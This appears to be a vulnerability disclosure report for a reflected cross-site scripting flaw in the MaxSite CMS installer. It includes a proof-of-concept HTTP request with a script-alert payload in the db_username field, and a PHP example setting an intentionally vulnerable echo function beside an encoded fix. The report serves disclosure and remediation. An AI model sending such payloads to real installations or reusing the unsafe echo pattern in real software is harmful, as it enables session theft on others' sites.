cms

vulnerability cross site scripting (xss)
severity 4.4
language php
registry other

✍️ Description

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

🕵️‍♂️ Proof of Concept

While setting up MaxSite CMS, the installer asks us to fill in the database details, and the submitted db_username value is reflected on the page without encoding. If we put <script>alert(1)</script> in that field and submit the form, the popup fires.
Here's the HTTP request:

POST /cms-1/install/ HTTP/1.1
Host: localhost
User-Agent: BadBoy17
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
Origin: http://localhost
Connection: close
Referer: http://localhost/cms-1/install/
Upgrade-Insecure-Requests: 1

username=hack&password=1234&email=hack%40hack.io&site_name=Pwn&db_hostname=localhost&db_username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&db_password=root&db_database=max&db_dbprefix=mso_
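The root cause described above is untrusted form input being written back into the installer page without output encoding. The following added example (not MaxSite CMS code; the field names come from the request in this report, the form layout and error message are assumptions) shows the vulnerable echo pattern beside a hardened version that encodes for the context the value lands in, using the report's db_username payload as constructed input:

```php
<?php
// Added example, not part of MaxSite CMS. Demonstrates the reflection bug
// class from the report and the output-encoding fix for it.
declare(strict_types=1);

/** Encode an untrusted value for an HTML text node or a quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/**
 * Vulnerable pattern: the submitted username is concatenated straight into
 * the page. In a text-node context the browser parses <script> as a tag.
 */
function render_connect_error_unsafe(string $db_username): string
{
    return '<p class="error">Could not connect as ' . $db_username . '</p>';
}

/** Hardened pattern: the same message with the value encoded first. */
function render_connect_error_safe(string $db_username): string
{
    return '<p class="error">Could not connect as ' . h($db_username) . '</p>';
}

/**
 * Re-populating the form after a failed attempt. Attribute context needs
 * quote encoding as well (ENT_QUOTES), otherwise a value containing a double
 * quote could break out of value="..." and add new attributes.
 */
function render_field_safe(string $name, string $value): string
{
    return '<input type="text" name="' . h($name) . '" value="' . h($value) . '">';
}

/** Simple self-check: encoded output must not contain a raw tag opener. */
function contains_raw_tag(string $html_fragment, string $untrusted): bool
{
    // If the untrusted value survives verbatim, encoding was skipped.
    return str_contains($html_fragment, $untrusted) && str_contains($untrusted, '<');
}

// Constructed sample input: the db_username value from the report's request
// (URL-decoded), plus the other database fields from the same request.
$submitted = [
    'db_hostname' => 'localhost',
    'db_username' => '<script>alert(1)</script>',
    'db_database' => 'max',
    'db_dbprefix' => 'mso_',
];

$unsafe = render_connect_error_unsafe($submitted['db_username']);
$safe   = render_connect_error_safe($submitted['db_username']);

echo "unsafe : $unsafe\n";            // script tag reaches the browser as markup
echo "safe   : $safe\n";              // rendered as literal text: &lt;script&gt;...
echo 'unsafe reflects raw tag: ' . var_export(contains_raw_tag($unsafe, $submitted['db_username']), true) . "\n";
echo 'safe reflects raw tag  : ' . var_export(contains_raw_tag($safe, $submitted['db_username']), true) . "\n";

foreach ($submitted as $name => $value) {
    echo render_field_safe($name, $value) . "\n";
}
```

The fix is applied at the output point, not the input point: rejecting angle brackets in db_username would break legitimate values and miss other contexts, whereas `htmlspecialchars` with `ENT_QUOTES` makes the value inert in both text-node and attribute positions. Running the installer's templates through a single encoding helper like `h()` is the change a reviewer would ask for here.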

💥 Impact

With the help of XSS, an attacker can perform social engineering on users by redirecting them from the real website to a fake one. An attacker can steal their cookies, leading to account takeover, or push a malware download onto their system, and there are many more attack scenarios a skilled attacker can carry out with XSS.
